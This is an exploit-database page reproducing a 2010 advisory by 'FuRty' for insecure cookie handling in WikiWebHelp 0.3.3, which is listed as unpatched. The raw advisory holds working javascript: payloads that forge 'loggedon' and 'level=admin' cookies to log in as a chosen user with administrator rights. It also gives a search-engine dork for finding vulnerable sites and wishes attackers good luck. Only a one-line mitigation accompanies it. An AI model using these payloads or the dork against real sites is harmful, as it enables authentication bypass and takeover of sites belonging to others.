WikiWebHelp v0.3.3 - exploit.company

vendor:

WikiWebHelp

by:

FuRty

8,3

CVSS

HIGH

Cookie Handling

N/A

CWE

Product Name: WikiWebHelp

Affected Version From: 0.3.3

Affected Version To: 0.3.3

Patch Exists: NO

Related CWE: N/A

CPE: a:wikiwebhelp:wikiwebhelp:0.3.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

WikiWebHelp v0.3.3 <= Insecure Cookie Handling

Browser Injection for handling() by Javascript-SQLi Codes. Do not rush to primarily target the site, please register:) javascript:document.cookie="loggedon=[VictimNICK];path=/"; javascript:document.cookie="level=admin;path=/";

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

===============================================
WikiWebHelp v0.3.3 <= Insecure Cookie Handling
===============================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : FuRty
[~] Contact : fir4t@fir4t.org
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : WikiWebHelp
~Version : 0.3.3
~Software: http://sourceforge.net/projects/wwh/
~Vendor : http://wikiwebhelp.org
~Vulnerability Style : Cookie Handling
~Google Keyword : Powered by WikiWebHelp
[~]Date : "17.10.2010"
-----------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        ~~~~~~~~ Explotation ~~~~~~~~~~~
 
    Browser Injection for handling() by Javascript-SQLi Codes
    ================================
    Do not rush to primarily target the site, please register:)

    javascript:document.cookie="loggedon=[VictimNICK];path=/"; javascript:document.cookie="level=admin;path=/";
    ================================
          [+]  Cookie Browser Injected!
 
          [+]  Logged on 
          
          
          
     Ýyi þanslar :C / GoodLuck